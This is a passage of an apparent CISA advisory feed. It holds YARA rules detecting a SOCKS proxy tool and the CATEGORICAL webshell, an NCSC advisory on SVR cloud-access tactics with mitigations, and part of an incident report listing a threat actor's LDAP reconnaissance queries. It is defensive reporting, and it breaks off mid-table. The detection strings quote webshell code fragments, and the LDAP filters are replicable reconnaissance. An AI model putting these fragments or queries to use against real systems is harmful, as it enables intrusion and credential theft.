2488. <p><code>rule hacktool_py_pysoxy</code><br><code>{</code><br><code>    meta:</code><br><code>        author = "threatintel@volexity.com"</code><br><code>        date = "2024-01-09"</code><br><code>        description = "SOCKS5 proxy tool used to relay connections."</code><br><code>        hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb"</code><br><code>        os = "all"</code><br><code>        os_arch = "all"</code><br><code>        reference = "https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py"</code><br><code>        report = "TIB-20240109"</code><br><code>        scan_context = "file,memory"</code><br><code>        last_modified = "2024-01-09T13:45Z"</code><br><code>        license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"</code><br><code>        rule_id = 10065</code><br><code>        version = 3</code></p>
2489. <p><code>    strings:</code><br><code>        $s1 = "proxy_loop" ascii</code><br><code>        $s2 = "connect_to_dst" ascii</code><br><code>        $s3 = "request_client" ascii</code><br><code>        $s4 = "subnegotiation_client" ascii</code><br><code>        $s5 = "bind_port" ascii</code></p>
2490. <p><code>    condition:</code><br><code>        all of them</code><br><code>}</code></p>
2491. </td>
2492. </tr>
2493. </tbody>
2494. </table>
2495. <table>
2496. <tbody>
2497. <tr>
2498. <td>
2499. <p><code>rule apt_webshell_py_categorical: UTA0178</code></p>
2500. <p><code>{</code></p>
2501. <p><code>    meta:</code></p>
2502. <p><code>        author = "threatintel@volexity.com"</code></p>
2503. <p><code>        date = "2024-01-18"</code></p>
2504. <p><code>        description = "Detection for the CATEGORICAL webshell."</code></p>
2505. <p><code>        os = "linux"</code></p>
2506. <p><code>        os_arch = "all"</code></p>
2507. <p><code>        scan_context = "file,memory"</code></p>
2508. <p><code>        severity = "critical"</code></p>
2509. <p> </p>
2510. <p><code>    strings:</code></p>
2511. <p><code>        $s1 = "exec(zlib.decompress(aes.decrypt(base64.b64decode" ascii</code></p>
2512. <p><code>        $s2 = "globals()[dskey].pop('result',None)" ascii</code></p>
2513. <p><code>        $s3 = "dsid=request.cookies.get('DSID'" ascii</code></p>
2514. <p> </p>
2515. <p><code>    condition:</code></p>
2516. <p><code>        any of ($s*)</code></p>
2517. <p><code>}</code></p>
2518. </td>
2519. </tr>
2520. </tbody>
2521. </table>
2522. </description>
2523.  <pubDate>Wed, 21 Feb 2024 15:30:03 EST</pubDate>
2524.    <dc:creator>CISA</dc:creator>
2525.    <guid isPermaLink="false">/node/21011</guid>
2526.    </item>
2527. <item>
2528.  <title>SVR Cyber Actors Adapt Tactics for Initial Cloud Access</title>
2529.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a</link>
2530.  <description>&lt;h4&gt;&lt;strong&gt;How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure&lt;/strong&gt;&lt;/h4&gt;
2531. <h3><strong>OVERVIEW</strong></h3>
2532. <p>This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.</p>
2533. <p>The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.</p>
2534. <p>This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.</p>
2535. <p>To download the PDF version of this report, click <a href="https://www.ncsc.gov.uk/files/Advisory-SVR-cyber-actors-adapt-tactics-for-initial-cloud-access.pdf">here</a>.</p>
2536. <h3><strong>PREVIOUS ACTOR ACTIVITY</strong></h3>
2537. <p>The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.</p>
2538. <p>SVR actors are also known for:</p>
2539. <ul>
2540. <li><a href="https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" title="UK and US call out Russia for SolarWinds compromise">The supply chain compromise of SolarWinds software</a>.</li>
2541. <li><a href="https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" title="Advisory: APT29 targets COVID-19 vaccine development">Activity that targeted organizations developing the COVID-19 vaccine</a>.</li>
2542. </ul>
2543. <h3><strong>EVOLVING TTPs</strong></h3>
2544. <p>As organizations continue to modernize their systems and move to cloud-based infrastructure, the SVR has adapted to these changes in the operating environment.</p>
2545. <p>They have to move beyond their traditional means of initial access, such as exploiting software vulnerabilities in an on-premises network, and instead target the cloud services themselves.</p>
2546. <p>To access the majority of the victims’ cloud hosted network, actors must first successfully authenticate to the cloud provider. Denying initial access to the cloud environment can prohibit SVR from successfully compromising their target. In contrast, in an on-premises system, more of the network is typically exposed to threat actors.</p>
2547. <p>Below describes in more detail how SVR actors are adapting to continue their cyber operations for intelligence gain. These TTPs have been observed in the last 12 months.</p>
2548. <h3><strong>ACCESS VIA SERVICE AND DORMANT ACCOUNTS</strong></h3>
2549. <p>Previous SVR campaigns reveal the actors have successfully used brute forcing [<a href="https://attack.mitre.org/versions/v14/techniques/T1110/" title="Brute Force">T1110</a>] and password spraying to access service accounts. This type of account is typically used to run and manage applications and services. There is no human user behind them so they cannot be easily protected with multi-factor authentication (MFA), making these accounts more susceptible to a successful compromise. Service accounts are often also highly privileged depending on which applications and services they’re responsible for managing. Gaining access to these accounts provides threat actors with privileged initial access to a network, to launch further operations.</p>
2550. <p>SVR campaigns have also targeted dormant accounts belonging to users who no longer work at a victim organization but whose accounts remain on the system [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a>].</p>
2551. <p>Following an enforced password reset for all users during an incident, SVR actors have also been observed logging into inactive accounts and following instructions to reset the password. This has allowed the actor to regain access following incident response eviction activities.</p>
2552. <h3><strong>CLOUD-BASED TOKEN AUTHENTICATION</strong></h3>
2553. <p>Account access is typically authenticated by either username and password credentials or system-issued access tokens. The NCSC and partners have observed SVR actors using tokens to access their victims’ accounts, without needing a password [<a href="https://attack.mitre.org/versions/v14/techniques/T1528/" title="Steal Application Access Token">T1528</a>].</p>
2554. <p>The default validity time of system-issued tokens varies dependent on the system; however, cloud platforms should allow administrators to adjust the validity time as appropriate for their users. More information can be found on this in the mitigations section of this advisory.</p>
2555. <h3><strong>ENROLLING NEW DEVICES TO THE CLOUD</strong></h3>
2556. <p>On multiple occasions, the SVR have successfully bypassed password authentication on personal accounts using password spraying and credential reuse. SVR actors have also then bypassed MFA through a technique known as “MFA bombing” or “MFA fatigue,” in which the actors repeatedly push MFA requests to a victim’s device until the victim accepts the notification [<a href="https://attack.mitre.org/versions/v14/techniques/T1621/" title="Multi-Factor Authentication Request Generation">T1621</a>].</p>
2557. <p>Once an actor has bypassed these systems to gain access to the cloud environment, SVR actors have been observed registering their own device as a new device on the cloud tenant [<a href="https://attack.mitre.org/versions/v14/techniques/T1098/005/" title="Account Manipulation: Device Registration">T1098.005</a>]. If device validation rules are not set up, SVR actors can successfully register their own device and gain access to the network.</p>
2558. <p>By configuring the network with device enrollment policies, there have been instances where these measures have defended against SVR actors and denied them access to the cloud tenant.</p>
2559. <h3><strong>RESIDENTIAL PROXIES</strong></h3>
2560. <p>As network-level defenses improve detection of suspicious activity, SVR actors have looked at other ways to stay covert on the internet. A TTP associated with this actor is the use of residential proxies [<a href="https://attack.mitre.org/versions/v14/techniques/T1090/002/" title="Proxy: External Proxy">T1090.002</a>]. Residential proxies typically make traffic appear to originate from IP addresses within internet service provider (ISP) ranges used for residential broadband customers and hide the true source. This can make it harder to distinguish malicious connections from typical users. This reduces the effectiveness of network defenses that use IP addresses as indicators of compromise, and so it is important to consider a variety of information sources such as application and host-based logging for detecting suspicious activity.</p>
2561. <h3><strong>CONCLUSION</strong></h3>
2562. <p>The SVR is a sophisticated actor capable of carrying out a global supply chain compromise such as the 2020 SolarWinds, however the guidance in this advisory shows that a strong baseline of cyber security fundamentals can help defend from such actors.</p>
2563. <p>For organizations that have moved to cloud infrastructure, a first line of defense against an actor such as SVR should be to protect against SVR’s TTPs for initial access. By following the mitigations outlined in this advisory, organizations will be in a stronger position to defend against this threat.</p>
2564. <p>Once the SVR gain initial access, the actor is capable of deploying highly sophisticated post compromise capabilities such as <a href="https://www.microsoft.com/en-us/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/" title="MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone">MagicWeb</a>, as reported in 2022. Therefore, mitigating against the SVR’s initial access vectors is particularly important for network defenders.</p>
2565. <p>CISA have also produced guidance through their <a href="https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project" title="Secure Cloud Business Applications (SCuBA) Project">Secure Cloud Business Applications (SCuBA) Project</a> which is designed to protect assets stored in cloud environments.</p>
2566. <p>Some of the TTPs listed in this report, such as residential proxies and exploitation of system accounts, are similar to those reported as recently as January 2024 by <a href="https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/" title="Midnight Blizzard: Guidance for responders on nation-state attack">Microsoft</a>.</p>
2567. <h3><strong>MITRE ATT&CK®</strong></h3>
2568. <p>This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.</p>
2569. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2570. <thead>
2571. <tr>
2572. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Tactic</strong></th>
2573. <th scope="col" role="columnheader"><strong>ID</strong></th>
2574. <th scope="col" role="columnheader"><strong>Technique</strong></th>
2575. <th scope="col" role="columnheader"><strong>Procedure</strong></th>
2576. </tr>
2577. </thead>
2578. <tbody>
2579. <tr>
2580. <td>
2581. <p><strong>Credential Access </strong></p>
2582. </td>
2583. <td>
2584. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1110/" title="Brute Force">T1110</a></p>
2585. </td>
2586. <td>
2587. <p>Brute Force</p>
2588. </td>
2589. <td>
2590. <p>The SVR use password spraying and brute forcing as an initial infection vector.</p>
2591. </td>
2592. </tr>
2593. <tr>
2594. <td>
2595. <p><strong>Initial Access</strong></p>
2596. </td>
2597. <td>
2598. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a></p>
2599. </td>
2600. <td>
2601. <p>Valid Accounts: Cloud Accounts</p>
2602. </td>
2603. <td>
2604. <p>The SVR use compromised credentials to gain access to accounts for cloud services, including system and dormant accounts.</p>
2605. </td>
2606. </tr>
2607. <tr>
2608. <td>
2609. <p><strong>Credential Access</strong></p>
2610. </td>
2611. <td>
2612. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1528/" title="Steal Application Access Token">T1528</a></p>
2613. </td>
2614. <td>
2615. <p>Steal Application Access Token</p>
2616. </td>
2617. <td>
2618. <p>The SVR use stolen access tokens to login to accounts without the need for passwords.</p>
2619. </td>
2620. </tr>
2621. <tr>
2622. <td>
2623. <p><strong>Credential Access</strong></p>
2624. </td>
2625. <td>
2626. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1621/" title="Multi-Factor Authentication Request Generation">T1621</a></p>
2627. </td>
2628. <td>
2629. <p>Multi-Factor Authentication Request Generation</p>
2630. </td>
2631. <td>
2632. <p>The SVR repeatedly push MFA requests to a victim’s device until the victim accepts the notification, providing SVR access to the account.</p>
2633. </td>
2634. </tr>
2635. <tr>
2636. <td>
2637. <p><strong>Command and Control</strong></p>
2638. </td>
2639. <td>
2640. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1090/002/" title="Proxy: External Proxy">T1090.002</a></p>
2641. </td>
2642. <td>
2643. <p>Proxy: External Proxy</p>
2644. </td>
2645. <td>
2646. <p>The SVR use open proxies in residential IP ranges to blend in with expected IP address pools in access logs.</p>
2647. </td>
2648. </tr>
2649. <tr>
2650. <td>
2651. <p><strong>Persistence</strong></p>
2652. </td>
2653. <td>
2654. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1098/005/" title="Account Manipulation: Device Registration">T1098.005</a></p>
2655. </td>
2656. <td>
2657. <p>Account Manipulation: Device Registration</p>
2658. </td>
2659. <td>
2660. <p>The SVR attempt to register their own device on the cloud tenant after acquiring access to accounts.</p>
2661. </td>
2662. </tr>
2663. </tbody>
2664. </table>
2665. <h3><strong>MITIGATION AND DETECTION</strong></h3>
2666. <p>A number of mitigations will be useful in defending against the activity described in this advisory: </p>
2667. <ul>
2668. <li>Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises. See NCSC guidance: <a href="https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services" title="Multi-factor authentication for online services">Multifactor Authentication for Online Services</a> and <a href="https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa" title="Setting up 2-Step Verification (2SV)">Setting up 2-Step Verification (2SV)</a>.</li>
2669. <li>Accounts that cannot use 2SV should have strong, unique passwords. User and system accounts should be disabled when no longer required with a “joiners, movers, and leavers” process in place and regular reviews to identify and disable inactive/dormant accounts. See NCSC guidance: <a href="https://www.ncsc.gov.uk/collection/10-steps/identity-and-access-management" title="10 Steps to Cyber Security">10 Steps to Cyber Security</a>.</li>
2670. <li>System and service accounts should implement the principle of least privilege, providing tightly scoped access to resources required for the service to function.</li>
2671. <li>Canary service accounts should be created which appear to be valid service accounts but are never used by legitimate services. Monitoring and alerting on the use of these account provides a high confidence signal that they are being used illegitimately and should be investigated urgently.</li>
2672. <li>Session lifetimes should be kept as short as practical to reduce the window of opportunity for an adversary to use stolen session tokens. This should be paired with a suitable authentication method that strikes a balance between regular user authentication and user experience.</li>
2673. <li>Ensure device enrollment policies are configured to only permit authorized devices to enroll. Use zero-touch enrollment where possible, or if self-enrollment is required then use a strong form of 2SV that is resistant to phishing and prompt bombing. Old devices should be prevented from (re)enrolling when no longer required. See NCSC guidance: <a href="https://www.ncsc.gov.uk/collection/device-security-guidance/getting-ready/provisioning-and-distributing-devices" title="Device Security Guidance">Device Security Guidance</a>.</li>
2674. <li>Consider a variety of information sources such as application events and host-based logs to help prevent, detect and investigate potential malicious behavior. Focus on the information sources and indicators of compromise that have a better rate of false positives. For example, looking for changes to user agent strings that could indicate session hijacking may be more effective than trying to identify connections from suspicious IP addresses. See NCSC guidance: <a href="https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes" title="Introduction to logging for security purposes">Introduction to Logging for Security Purposes</a>.</li>
2675. </ul>
2676. <h3><strong>DISCLAIMER</strong></h3>
2677. <p>This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.</p>
2678. <p>This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.</p>
2679. <p>Refer any FOIA queries to <a href="mailto:ncscinfoleg@ncsc.gov.uk">ncscinfoleg@ncsc.gov.uk</a>.</p>
2680. <p>All material is UK Crown Copyright.</p>
2681. </description>
2682.  <pubDate>Fri, 23 Feb 2024 12:37:53 EST</pubDate>
2683.    <dc:creator>CISA</dc:creator>
2684.    <guid isPermaLink="false">/node/21015</guid>
2685.    </item>
2686. <item>
2687.  <title>Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization</title>
2688.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-046a</link>
2689.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
2690. <p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[<a href="https://www.cisa.gov/sites/default/files/2023-07/FY22-RVA-Analysis%20-%20Final_508c.pdf" title="CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments">1</a>] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment.</p>
2691. <p>CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts.</p>
2692. <p>Download the PDF version of this report:</p>
2693.  
2694.  
2695.  
2696.  
2697.  
2698. <div class="c-file">
2699.    <div class="c-file__download">
2700.    <a href="https://www.cisa.gov/sites/default/files/2024-02/aa24-046a-threat-actor-leverages-compromised%20account-of%20former-employee.pdf" class="c-file__link" target="_blank">AA24-046A Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization</a>
2701.    <span class="c-file__size">(PDF,       499.99 KB
2702.  )</span>
2703.  </div>
2704. </div>
2705. <h3><strong>TECHNICAL DETAILS</strong></h3>
2706. <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK for Enterprise</a> framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actor’s activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
2707. <h4><strong>Overview</strong></h4>
2708. <p>A state government organization was notified that documents containing host and user information, including metadata, were posted on a dark web brokerage site. After further investigation, the victim organization determined that the documents were accessed via the compromised account of a former employee. Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[<a href="https://www.cisa.gov/sites/default/files/2023-07/FY22-RVA-Analysis%20-%20Final_508c.pdf" title="CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments">1</a>] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee.</p>
2709. <p>The scope of this investigation included the victim organization’s on-premises environment, as well as their Azure environment, which hosts sensitive systems and data. Analysis determined the threat actor did not move laterally from the compromised on-premises network to the Azure environment and did not compromise sensitive systems.</p>
2710. <h5><em><strong>Untitled Goose Tool</strong></em></h5>
2711. <p>Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA’s <a href="https://www.cisa.gov/resources-tools/resources/untitled-goose-tool-fact-sheet" title="Untitled Goose Tool Fact Sheet">Untitled Goose Tool</a>—a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments. CISA developed the Untitled Goose Tool to export and review AAD sign-in and audit logs, M365 unified audit logs (UAL), Azure activity logs, and MDE data. By exporting cloud artifacts, Untitled Goose Tool supports incident response teams with environments that do not ingest logs into a security information and event management (SIEM) tool.</p>
2712. <h4><strong>Threat Actor Activity</strong></h4>
2713. <p>The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>] with the intent to blend in with legitimate traffic to evade detection.</p>
2714. <h5><em><strong>Initial Access: Compromised Domain Accounts</strong></em></h5>
2715. <p><strong>USER1</strong>: The threat actor gained initial access through the compromised account of a former employee with administrative privileges (<code>USER1</code>) [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a>] to conduct reconnaissance and discovery activities. The victim organization confirmed that this account was not disabled immediately following the employee’s departure.</p>
2716. <ul>
2717. <li>The threat actor likely obtained the <code>USER1</code> account credentials in a separate data breach due to the credentials appearing in publicly available channels containing leaked account information [<a href="https://attack.mitre.org/versions/v14/techniques/T1589/001/" title="Gather Victim Identity Information: Credentials">T1589.001</a>].</li>
2718. <li><code>USER1</code> had access to two virtualized servers including SharePoint and the workstation of the former employee. The workstation was virtualized from a physical workstation using the Veeam Physical to Virtual (P2V) function within the backup software.</li>
2719. </ul>
2720. <p><strong>USER2</strong>: The threat actor likely obtained the <code>USER2</code> account credentials from the virtualized SharePoint server managed by <code>USER1</code> [<a href="https://attack.mitre.org/versions/v14/techniques/T1213/002/" title="Data from Information Repositories: Sharepoint">T1213.002</a>]. The victim confirmed that the administrator credentials for <code>USER2</code> were stored locally on this server [<a href="https://attack.mitre.org/versions/v14/techniques/T1552/001/" title="Unsecured Credentials: Credentials In Files">T1552.001</a>].</p>
2721. <ul>
2722. <li>Through connection from the VM, the threat actor authenticated to multiple services [<a href="https://attack.mitre.org/versions/v14/techniques/T1021/" title="Remote Services">T1021</a>] via the <code>USER1</code> account, as well as from an additional compromised global domain administrator account (<code>USER2</code>) [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a>].</li>
2723. </ul>
2724. <ul>
2725. <li>The threat actor’s use of the <code>USER2</code> account was impactful due to the access it granted to both the on-premises AD and Azure AD [<a href="https://attack.mitre.org/versions/v14/techniques/T1021/007/" title="Remote Services: Cloud Services">T1021.007</a>], thus enabling administrative privileges [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a>].</li>
2726. </ul>
2727. <p>Following notification of the dark web posting, the victim organization immediately disabled the <code>USER1</code> account and took the two virtualized servers associated with the former employee offline. The victim also changed the password for the <code>USER2</code> account and removed administrator privileges. Neither of the administrative accounts had multifactor authentication (MFA) enabled.</p>
2728. <h5><em><strong>LDAP Queries</strong></em></h5>
2729. <p>Through connection from the VM, the threat actor conducted LDAP queries of the AD, likely using the open source tool <code>AdFind.exe</code>, based on the format of the output. CISA and MS-ISAC assess the threat actor executed the LDAP queries [<a href="https://attack.mitre.org/versions/v14/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a>] to collect user, host [<a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a>], and trust relationship information [<a href="https://attack.mitre.org/versions/v14/techniques/T1482/" title="Domain Trust Discovery">T1482</a>]. It is also believed the LDAP queries generated the text files the threat actor posted for sale on the dark web brokerage site: <code>ad_users.txt</code>, <code>ad_computers.txt</code>, and <code>trustdmp.txt</code>.</p>
2730. <p>Table 1 lists all queries that were conducted between 08:39:43-08:40:56 Coordinated Universal Time (UTC).</p>
2731. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2732. <caption><em>Table 1: LDAP Queries Conducted by the Threat Actor</em></caption>
2733. <thead>
2734. <tr>
2735. <td><strong>Query</strong></td>
2736. <td><strong>Description</strong></td>
2737. </tr>
2738. </thead>
2739. <tbody>
2740. <tr>
2741. <td>
2742. <p>LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)</p>
2743. </td>
2744. <td>
2745. <p>Collects names and metadata of users in the domain.</p>
2746. </td>
2747. </tr>
2748. <tr>
2749. <td>
2750. <p>LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)</p>
2751. </td>
2752. <td>
2753. <p>Collects names and metadata of hosts in the domain.</p>
2754. </td>
2755. </tr>
2756. <tr>
2757. <td>
2758. <p>LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)</p>
2759. </td>
2760. <td>
2761. <p>Collects trust information in the domain.</p>
2762. </td>
2763. </tr>
2764. <tr>
2765. <td>
2766. <p>LDAP Search Scope: WholeSubtree, Base Object: DC=[REDACTED],DC=local, Search Filter: ( &  ( &  (sAMAccountType=805306368)  (servicePrincipalName=*) ( ! (sAMAccountName=krbtgt) ) ( !  (userAccountControl&2) ) )  (adminCount=1) )</p>
2767. </td>
2768. <td>
2769. <p>Collects Domain Administrators and Service Principals in the domain.</p>
2770. </td>
2771. </tr>
2772. </tbody>
2773. </table>
2774. <h5><em><strong>Service Authentication</strong></em></h5>
2775. <p>Through the VM connection, the threat actor was observed authenticating to various services on the victim organization’s network from the <code>USER1</code> and <code>USER2</code> administrative accounts. In all instances, the threat actor authenticated to the Common Internet File Service (CIFS) on various endpoints [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a>],[<a href="https://attack.mitre.org/versions/v14/techniques/T1021/002/" title="Remote Services: SMB/Windows Admin Shares">T1021.002</a>]—a protocol used for providing shared access to files and printers between machines on the network. This was likely used for file, folder, and directory discovery [<a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a>], and assessed to be executed in an automated manner.</p>
2776. <ul>
2777. <li><code>USER1</code> authenticated to four services, presumably for the purpose of network and service discovery [<a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a>].</li>
2778. <li><code>USER2</code> authenticated to twelve services. <strong>Note: </strong>This account had administrative privileges to both the on-premises network and Azure tenant.</li>
2779. </ul>
2780. <h3><strong>MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
2781. <p>See Tables 2-9 for all referenced threat actor’s tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
2782. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2783. <caption><em>Table 2: Reconnaissance</em></caption>
2784. <thead>
2785. <tr>
2786. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
2787. <th scope="col" role="columnheader"><strong>ID</strong></th>
2788. <th scope="col" role="columnheader"><strong>Use</strong></th>
2789. </tr>
2790. </thead>
2791. <tbody>
2792. <tr>
2793. <td>
2794. <p>Gather Victim Identity Information: Credentials</p>
2795. </td>
2796. <td>
2797. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1589/001/" title="Gather Victim Identity Information: Credentials">T1589.001</a></p>
2798. </td>
2799. <td>
2800. <p>The actor likely gathered <code>USER1</code> account credentials in a data breach where account information appeared in publicly available channels.</p>
2801. </td>
2802. </tr>
2803. </tbody>
2804. </table>
2805. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2806. <caption><em>Table 3: Initial Access</em></caption>
2807. <thead>
2808. <tr>
2809. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
2810. <th scope="col" role="columnheader"><strong>ID</strong></th>
2811. <th scope="col" role="columnheader"><strong>Use</strong></th>
2812. </tr>
2813. </thead>
2814. <tbody>
2815. <tr>
2816. <td>
2817. <p>Valid Accounts: Domain Accounts</p>
2818. </td>
2819. <td>
2820. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a></p>
2821. </td>
2822. <td>
2823. <p>The actor gained initial access through the compromised account of a former employee with administrative privileges (<code>USER1</code>). The employee’s account was not immediately disabled after their departure.</p>
2824. </td>
2825. </tr>
2826. </tbody>
2827. </table>
2828. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2829. <caption><em>Table 4: Persistence</em></caption>
2830. <thead>
2831. <tr>
2832. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
2833. <th scope="col" role="columnheader"><strong>ID</strong></th>
2834. <th scope="col" role="columnheader"><strong>Use</strong></th>
2835. </tr>
2836. </thead>
2837. <tbody>
2838. <tr>
2839. <td>
2840. <p>External Remote Services</p>
2841. </td>
2842. <td>
2843. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></p>
2844. </td>
2845. <td>
2846. <p>The actor connected a VM via the victim’s VPN to blend in with legitimate traffic to evade detection.</p>
2847. </td>
2848. </tr>
2849. </tbody>
2850. </table>
2851. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2852. <caption><em>Table 5: Privilege Escalation</em></caption>
2853. <thead>
2854. <tr>
2855. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
2856. <th scope="col" role="columnheader"><strong>ID</strong></th>
2857. <th scope="col" role="columnheader"><strong>Use</strong></th>
2858. </tr>
2859. </thead>
2860. <tbody>
2861. <tr>
2862. <td>
2863. <p>Valid Accounts: Domain Accounts</p>
2864. </td>
2865. <td>
